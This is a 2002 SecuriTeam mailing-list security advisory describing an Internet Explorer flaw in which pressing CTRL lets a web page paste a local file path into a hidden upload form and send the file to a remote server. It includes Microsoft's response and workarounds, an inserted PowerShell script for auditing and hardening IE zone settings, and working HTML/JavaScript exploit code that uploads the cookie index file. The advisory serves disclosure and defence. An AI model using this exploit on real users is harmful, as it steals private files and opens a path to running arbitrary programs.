[NT] Why Pressing CTRL in IE is Dangerous

From: support@securiteam.com
Date: 07/24/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 24 Jul 2002 10:58:34 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Why Pressing CTRL in IE is Dangerous
------------------------------------------------------------------------

SUMMARY

Pressing CTRL in IE may result in an arbitrary local file being uploaded to a
remote server (the exact path does not need to be known). If certain sensitive
files are uploaded, the information they contain can be used to run arbitrary
programs.

DETAILS

A specially crafted web page can retrieve any local file using simple
JavaScript. This is possible by performing the following steps:

1. When a user presses the CTRL key, an onkeydown handler can be set to fire.
In the handler the key code is changed to that of 'V', so IE processes the
keystroke as CTRL+V. The result is a paste operation that is subject to fewer
restrictions than a scripted one.

2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into the
form, yielding a change of value for the file upload field (not normally
allowed).

3. The upload form is submitted automatically (legal JavaScript
operation).

It isn't necessary to know the exact path to local files because it's
possible to refer to a file with "..\filename".

Furthermore, if the local file "..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
is uploaded, the randomly named directories needed to build the exact path to
the Temporary Internet Files folder can be read from it. Knowing the exact
path, a compiled help file (.chm) can be dropped into the cache and launched
with showHelp() (the old .chm attack). A compiled help file is allowed to
contain instructions that execute arbitrary programs.

Vendor status:
02-06-16
Microsoft was contacted about the issue.

02-07-23
Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does not
meet the bar of a security vulnerability. We will not be releasing a
hotfix or patch for this issue."

They proposed the following possible workarounds:
1. Disable or set to prompt - "Submit non encrypted form data" option
2. Disable "allow paste operations via script" (best)
3. Disable active scripting
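The three workarounds above are Internet Explorer zone settings, stored per zone as URL action values in the registry. The following PowerShell script is an added example (it is not part of the advisory or of Microsoft's statement) that audits those three settings in the Internet zone and, with -Harden, applies the workaround. The action IDs are Microsoft's documented zone action values (1400 Active scripting, 1407 Allow paste operations via script, 1601 Submit non-encrypted form data; data 0 = enable, 1 = prompt, 3 = disable); the $Desired table, the -Harden switch and the choice to leave active scripting at "prompt" are assumptions made for this example.

```powershell
# Added example: audit/harden the Internet-zone (zone 3) settings named as
# workarounds in the advisory. Not part of the original advisory.
param([switch]$Harden)

$ZonePath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'

# URL action IDs (Microsoft's documented zone action values)
$Actions = @{
    '1407' = 'Allow paste operations via script'
    '1601' = 'Submit non-encrypted form data'
    '1400' = 'Active scripting'
}
# Target state chosen for this example: paste-via-script disabled (the
# advisory's "best" workaround), form submission and active scripting at
# least set to prompt. Use 3 for 1400 to disable active scripting entirely.
$Desired = @{ '1407' = 3; '1601' = 1; '1400' = 1 }
$Meaning = @{ 0 = 'enabled'; 1 = 'prompt'; 3 = 'disabled' }

if (-not (Test-Path $ZonePath)) { throw "Zone key not found: $ZonePath" }
$zone = Get-ItemProperty -Path $ZonePath

foreach ($id in $Actions.Keys) {
    $current = $zone.$id
    # An absent value means the zone template default applies; the advisory
    # assumes IE defaults, under which these actions are enabled, so report 0.
    if ($null -eq $current) { $current = 0 }
    $current = [int]$current
    $state = if ($Meaning.ContainsKey($current)) { $Meaning[$current] } else { "raw $current" }
    $weak = $current -lt $Desired[$id]
    $flag = if ($weak) { '  <-- weaker than workaround' } else { '' }
    '{0} ({1}): {2}{3}' -f $Actions[$id], $id, $state, $flag
    if ($Harden -and $weak) {
        Set-ItemProperty -Path $ZonePath -Name $id -Value $Desired[$id] -Type DWord
        '  set {0} to {1}' -f $id, $Meaning[$Desired[$id]]
    }
}
```

Run it without arguments to report, or with -Harden to write the values. The script reads the per-user key; on machines where Group Policy sets Security_HKLM_only under Internet Settings, the effective values live under the corresponding HKLM key instead and the path must be adjusted accordingly.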

Exploit:
Instructions:
Put the HTML code in a remote HTML document and load it with Internet
Explorer. Activate the exploit by pressing CTRL. You must prepare a server
side script to take care of the upload process ("upload.php"). If you
choose to use PHP we recommend
http://www.php.net/manual/en/features.file-upload.php as a reference on
how to set up a server side script that handles a file upload.

Note:
1. Please remove all "!" characters in the exploit code. They have been
inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.

Exploit code:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
  if (!event.ctrlKey) return;
  document.onkeydown = null;
  event.keyCode = 86;
  window.clipboardData.setData("Text",uploadFile);
  (p=document.forms.u.file).focus();
  p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------

ADDITIONAL INFORMATION

The information has been provided by Andreas Sandblad <sandblad@acc.umu.se>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


